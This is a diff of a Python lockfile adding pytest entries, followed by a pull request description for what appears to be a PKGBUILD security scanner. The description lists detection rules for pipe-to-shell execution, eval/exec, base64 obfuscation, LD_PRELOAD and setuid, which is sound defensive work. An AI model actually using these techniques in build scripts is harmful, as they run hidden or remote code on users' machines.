+    { name = "colorama", marker = "python_full_version == '3.9.*' and sys_platform == 'win32'" },
+    { name = "exceptiongroup", marker = "python_full_version == '3.9.*'" },
+    { name = "iniconfig", version = "2.1.0", source = { registry = "https://pypi.org/simple" }, marker = "python_full_version == '3.9.*'" },
+    { name = "packaging", marker = "python_full_version == '3.9.*'" },
+    { name = "pluggy", version = "1.6.0", source = { registry = "https://pypi.org/simple" }, marker = "python_full_version == '3.9.*'" },
+    { name = "pygments", marker = "python_full_version == '3.9.*'" },
+    { name = "tomli", marker = "python_full_version == '3.9.*'" },
+]
+sdist = { url = "https://files.pythonhosted.org/packages/a3/5c/00a0e072241553e1a7496d638deababa67c5058571567b92a7eaa258397c/pytest-8.4.2.tar.gz", hash = "sha256:86c0d0b93306b961d58d62a4db4879f27fe25513d4b969df351abdddb3c30e01", size = 1519618, upload-time = "2025-09-04T14:34:22.711Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/a8/a4/20da314d277121d6534b3a980b29035dcd51e6744bd79075a6ce8fa4eb8d/pytest-8.4.2-py3-none-any.whl", hash = "sha256:872f880de3fc3a5bdc88a11b39c9710c3497a547cfa9320bc3c5e62fbf272e79", size = 365750, upload-time = "2025-09-04T14:34:20.226Z" },
+]
+
+[[package]]
+name = "pytest"
+version = "9.0.2"
+source = { registry = "https://pypi.org/simple" }
+resolution-markers = [
+    "python_full_version >= '3.10'",
+]
+dependencies = [
+    { name = "colorama", marker = "python_full_version >= '3.10' and sys_platform == 'win32'" },
+    { name = "exceptiongroup", marker = "python_full_version == '3.10.*'" },
+    { name = "iniconfig", version = "2.3.0", source = { registry = "https://pypi.org/simple" }, marker = "python_full_version >= '3.10'" },
+    { name = "packaging", marker = "python_full_version >= '3.10'" },
+    { name = "pluggy", version = "1.6.0", source = { registry = "https://pypi.org/simple" }, marker = "python_full_version >= '3.10'" },
+    { name = "pygments", marker = "python_full_version >= '3.10'" },
+    { name = "tomli", marker = "python_full_version == '3.10.*'" },
+]
+sdist = { url = "https://files.pythonhosted.org/packages/d1/db/7ef3487e0fb0049ddb5ce41d3a49c235bf9ad299b6a25d5780a89f19230f/pytest-9.0.2.tar.gz", hash = "sha256:75186651a92bd89611d1d9fc20f0b4345fd827c41ccd5c299a868a05d70edf11", size = 1568901, upload-time = "2025-12-06T21:30:51.014Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/3b/ab/b3226f0bd7cdcf710fbede2b3548584366da3b19b5021e74f5bde2a8fa3f/pytest-9.0.2-py3-none-any.whl", hash = "sha256:711ffd45bf766d5264d487b917733b453d917afd2b0ad65223959f59089f875b", size = 374801, upload-time = "2025-12-06T21:30:49.154Z" },
 ]
 
 [[package]]
@@ -717,7 +882,8 @@ name = "types-pyyaml"
 version = "6.0.12.20250516"
 source = { registry = "https://pypi.org/simple" }
 resolution-markers = [
-    "python_full_version >= '3.9'",
+    "python_full_version >= '3.10'",
+    "python_full_version == '3.9.*'",
 ]
 sdist = { url = "https://files.pythonhosted.org/packages/4e/22/59e2aeb48ceeee1f7cd4537db9568df80d62bdb44a7f9e743502ea8aab9c/types_pyyaml-6.0.12.20250516.tar.gz", hash = "sha256:9f21a70216fc0fa1b216a8176db5f9e0af6eb35d2f2932acb87689d03a5bf6ba", size = 17378, upload-time = "2025-05-16T03:08:04.897Z" }
 wheels = [
@@ -744,7 +910,8 @@ name = "types-requests"
 version = "2.32.4.20250611"
 source = { registry = "https://pypi.org/simple" }
 resolution-markers = [
-    "python_full_version >= '3.9'",
+    "python_full_version >= '3.10'",
+    "python_full_version == '3.9.*'",
 ]
 dependencies = [
     { name = "urllib3", version = "2.5.0", source = { registry = "https://pypi.org/simple" }, marker = "python_full_version >= '3.9'" },
@@ -771,7 +938,8 @@ name = "typing-extensions"
 version = "4.14.1"
 source = { registry = "https://pypi.org/simple" }
 resolution-markers = [
-    "python_full_version >= '3.9'",
+    "python_full_version >= '3.10'",
+    "python_full_version == '3.9.*'",
 ]
 sdist = { url = "https://files.pythonhosted.org/packages/98/5a/da40306b885cc8c09109dc2e1abd358d5684b1425678151cdaed4731c822/typing_extensions-4.14.1.tar.gz", hash = "sha256:38b39f4aeeab64884ce9f74c94263ef78f3c22467c8724005483154c26648d36", size = 107673, upload-time = "2025-07-04T13:28:34.16Z" }
 wheels = [
@@ -795,7 +963,8 @@ name = "urllib3"
 version = "2.5.0"
 source = { registry = "https://pypi.org/simple" }
 resolution-markers = [
-    "python_full_version >= '3.9'",
+    "python_full_version >= '3.10'",
+    "python_full_version == '3.9.*'",
 ]
 sdist = { url = "https://files.pythonhosted.org/packages/15/22/9ee70a2574a4f4599c47dd506532914ce044817c7752a79b6a51286319bc/urllib3-2.5.0.tar.gz", hash = "sha256:3fc47733c7e419d4bc3f6b3dc2b4f890bb743906a30d56ba4a5bfa4bbff92760", size = 393185, upload-time = "2025-06-18T14:07:41.644Z" }
 wheels = [


### PR DESCRIPTION
…mprovements

- Split 353-line cli.py monolith into focused modules: scoring.py, fetchers.py, rules.py, output.py
- Add new execution detection: pipe-to-shell (-30), eval/exec (-15), bash -c (-15), base64 obfuscation (-25), LD_PRELOAD (-20), setuid (-10)
- Fix false positives: pacman -T (deptest), chmod 755, per-arch checksums (sha256sums_x86_64=), sha256 no longer penalized as weak hash
- Add ANSI color output respecting NO_COLOR; add --json flag
- Add 59 pytest tests with fixture PKGBUILDs (clean/moderate/malicious)
- Add CLAUDE.md project instructions for future sessions
- Strip ML additions (aurscraper, build_dataset, train_xgb) from branch